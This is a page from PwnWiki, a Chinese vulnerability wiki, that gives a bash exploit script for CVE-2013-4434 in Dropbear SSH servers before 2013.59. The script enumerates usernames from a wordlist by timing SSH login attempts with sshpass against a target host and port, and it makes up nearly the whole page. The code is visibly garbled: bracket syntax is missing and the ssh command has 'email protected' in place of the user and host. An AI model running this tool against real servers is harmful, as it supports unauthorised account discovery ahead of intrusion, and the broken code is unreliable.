免费、自由、人人可编辑的漏洞库--PwnWiki.com
,
EXP
#!/bin/bash
# Affected Systems: Dropbear SSH Server before 2013.59
# CVE-ID: CVE-2013-4434
# Author: styx00
# Colours <3
RED='\0330;31m'
GREEN='\0330;32m'
BOLD=$(tput bold)
RESET=$(tput sgr0)
# Check if 'sshpass' is installed first
dpkg -l "sshpass" > /dev/null 2>&1
INSTALLED=$?
printf "Checking if the 'sshpass' package is installed...\n"
if $INSTALLED == '0' ; then
printf "${GREEN}${BOLD}+ The 'sshpass' package is installed. Let's proceed!${RESET}\n\n"
else
printf "${RED}${BOLD}- The 'sshpass' package is not installed.${RESET}\n\n"
exit 1
fi
# Function to show the script's usage
function usage
{
printf "Usage: ./dropbear_CVE-2013.sh -t example.com -p 22 -w /home/styx00/usernames.txt"
printf "\n\t-t, --target\tTarget FQDN or IP address"
printf "\n\t-p, --port\tPort number"
printf "\n\t-w, --wordlist\tWordlist containing usernames"
printf "\n\t-h, --help\tShow help and exit\n"
}
while "$1" != "" ; do
case $1 in
-t | --target ) shift
target=$1
;;
-p | --port ) shift
port=$1
;;
-w | --wordlist ) shift
wordlist=$1
;;
-h | --help ) usage
exit
;;
* ) usage
exit 1
esac
shift
done
if "$target" != "" && "$port" != "" && "$wordlist" != ""
then
printf "Target: %s\n" "${target}"
printf "port: %s\n" "${port}"
printf "Wordlist: %s\n" "${wordlist}"
printf "\nTesting\n---------------\n"
trap "exit" INT # Exit on SIGINT
for username in $(cat $wordlist)
do
printf "\n${username}\n\t"
/usr/bin/time --quiet -f "\tTime: %e" sshpass -p "password" ssh -T email protected$target -p $port </dev/null
done
printf "\n---------------\n"
else
usage
fi
PWNWIK.COM
